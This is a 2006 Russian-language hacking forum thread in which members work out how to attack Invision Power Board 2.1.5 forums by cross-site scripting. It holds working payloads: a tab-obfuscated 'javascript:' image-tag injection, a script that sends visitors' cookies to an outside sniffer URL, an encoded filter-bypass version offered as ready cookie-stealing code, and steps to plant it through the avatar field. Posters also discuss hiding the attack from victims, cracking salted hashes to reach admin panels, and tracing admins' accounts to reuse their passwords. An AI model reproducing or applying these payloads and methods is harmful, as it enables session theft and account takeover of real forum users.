Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Invision 2.1.5 Xss (https://forum.antichat.xyz/showthread.php?t=17358)

sexxx 09.04.2006 12:37

Invision 2.1.5 Xss
 
Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.

GreenBear 09.04.2006 12:40

Цитата:

помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
а попробовать? не работает.

iNcluDe 09.04.2006 12:53

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4

sexxx 09.04.2006 13:52

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.

member_ru 09.04.2006 14:22

sexxx, никак, пока XSSбаги там не нашли.

Otaku 09.04.2006 15:30

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.

CinerX 09.04.2006 20:49

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

Noth!nG 09.04.2006 21:47

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?

1SeTh 09.04.2006 21:56

Цитата:

Сообщение от CinerX
вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

Работает спасибо :)))
а теперь после того как получил алерт что мне делать?
заранее спасибо

CinerX 10.04.2006 01:38

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)

Otaku 10.04.2006 17:58

Вроде похоже на
http://forum.antichat.ru/thread15709.html

1SeTh 11.04.2006 23:14

Цитата:

Сообщение от CinerX
тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)

Не понял вместо
[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???

1SeTh 12.04.2006 00:00

Попробал вот это
[img]j a v a s c r i p t:document.images[1].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;.jpg[/img]

и вот что мне выдал
Sorry, dynamic pages in the [IMG] tags are not allowed

вместо знака вопроса пробавл вот это %3F затем &#x3F; и это &#63

_CinerX 12.04.2006 00:18

Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
" пробел ; ' + ?
возможно еще [ ]

Цитата:

XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???
Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)

Qwazar 13.04.2006 04:00

Хмм.. Ну никак не удаётся протащить ? и ;

Grrl 13.04.2006 08:58

там хэши наскоко помню соленые так что толку от xss ...

Otaku 13.04.2006 17:21

Почитать внутренние форумы и личные мессаги. Ещё поиграться.

_CinerX 14.04.2006 01:36

Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:
Код:

[im*g]j        a        v        a        s        c        r        i        p        t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g]
пояснение:
1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
3)Этот код пашет токо под ИЕ.
4)Убираем звездочки только с тегов [img] и [/img]

ПС просьба репу добавлять CinerX, а не _CinerX

_CinerX 14.04.2006 02:56

Для Ipb 2.1.5:
Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

ПС репу поднимаем CinerX, а не _CinerX

1SeTh 14.04.2006 22:47

Sorry, that is not a valid file extension

У меня не получаеться ничего (((

1SeTh 14.04.2006 23:18

и так тоже не получаеться
[img]j a v a s c r i p t:document.images%5B1%5D.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27+document.cookie%3B.jpg[/img]

drmist 14.04.2006 23:30

На портале не одна статья по xss.
Ищи.
------------
ой блин - а напостили то сколько
в таком случае мой ответ - движок что-то из твоего запроса фильтрует

1SeTh 15.04.2006 00:06

Про xss на античате уже давно читал. Тут только как делать алерт обьясняют, а про сниффера нету. А алерт у меня есть.

Otaku 15.04.2006 08:50

Есть про сниффер. Пойду сейчас на локалке проверю предъявленные способы.

Qwazar 15.04.2006 16:46

Всё работает на 2.1.5, если через аватару. Правда, там где я проверял была ещё одна защита от дурака (но неизобретательного дурака).

Otaku 15.04.2006 17:35

Цитата:

Всё работает на 2.1.5, если через аватару. Правда, там где я проверял была ещё одна защита от дурака (но неизобретательного дурака).
Изобретательных дураков не бывает. Изобретательный-не дурак. :)

Кстати вроде бы джордоновская Xss для 2.1.4 работает в этой версии.

SanyaX 15.04.2006 17:51

Поцан просто не знал как с Xss быть воти отмазался.

_CinerX 15.04.2006 21:06

Хм... Вот для тех кто пишет, что ни фига на работает:
http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt

Qwazar 16.04.2006 12:53

Цитата:

Сообщение от Otaku
Кстати вроде бы джордоновская Xss для 2.1.4 работает в этой версии.

А дай пожалуйста ссылку, попробую. А то через аватару всё же сильно палевно :(

Otaku 16.04.2006 13:11

Я дал уже!!!
Причём в ЭТОЙ теме!!!!!

1SeTh 19.04.2006 23:22

Я и у меня тоже наконецто получилось ответ ищите в этой теме
Теперь такой вопрос встал как сделать чтобы а аватаре было картинка еще, чтобы никто не заподозрил?

Qwazar 20.04.2006 15:41

Я уже задавал этот вопрос, ответ - никак, ссылка: http://forum.antichat.ru/thread17664.html

1SeTh 20.04.2006 22:52

У меня есть сниффер установленный на локалхосте. Я его залил на хост где поддерживвает пхп. Так вот когда на ссылку нажимаешь то открываеться картинка. Но это все работает у меня только на локалхосте. А так когда я нажимаю на ссылку она закачывается. Незнаю может я через лису просматривал из за этого так. Хочу сказать что можно.

CinerX 24.04.2006 15:00

Цитата:

У меня есть сниффер установленный на локалхосте. Я его залил на хост где поддерживвает пхп. Так вот когда на ссылку нажимаешь то открываеться картинка. Но это все работает у меня только на локалхосте. А так когда я нажимаю на ссылку она закачывается. Незнаю может я через лису просматривал из за этого так. Хочу сказать что можно.
Ни чего не понял! Как же тогда она открывается как аватара, если она закачивается???

Dimazzz 24.04.2006 22:48

Все работает на ура :)!!!
Есть вопрос хеш получен но проблема его расшифровать , наверное он с солью. Как можно соль узнать??
И еще как можно попасть в админку?

Otaku 25.04.2006 11:06

Через Xss никак. Там соль.

Barsik 25.04.2006 13:31

Можно попробовать сделать следущее (Меня такой способ много раз выручал)
Если известна Аська админа Например 123456789
Идем в гугле или яндекс и пишем ICQ 123456789
Если ничего не получиться типа не найдет то
Можно Если зная мыло задать такойже запрос (Тока с мылом например admin@admin.ru)
Если уж ничего не получается то по нику хотяб. (Пишешь Профиль пользователя Его-Ник)
Если тебе в одном из перечисленных случаев повезет (вылезет профиль пользователя его ник итд итп) то попробуй отыскать бажный форум ipb 1.3 версии и попробуй из него вытащить hash который можно легко расшифровать... Возможно он подойдет от админки твоего форума.
Еще раз повторяю этот способ мне помогал очень много раз.

BUTUZ 28.04.2006 10:36

как понять поставить вместо пробелов табуляцию???

Otaku 28.04.2006 10:58

Скопировать с этого форума сплойт в блокнот. И везде где пробелы удалить их, а вместо них поставить табуляции!!!!

BUTUZ 28.04.2006 11:28

сорри ступил алерт прошёл


Время: 12:34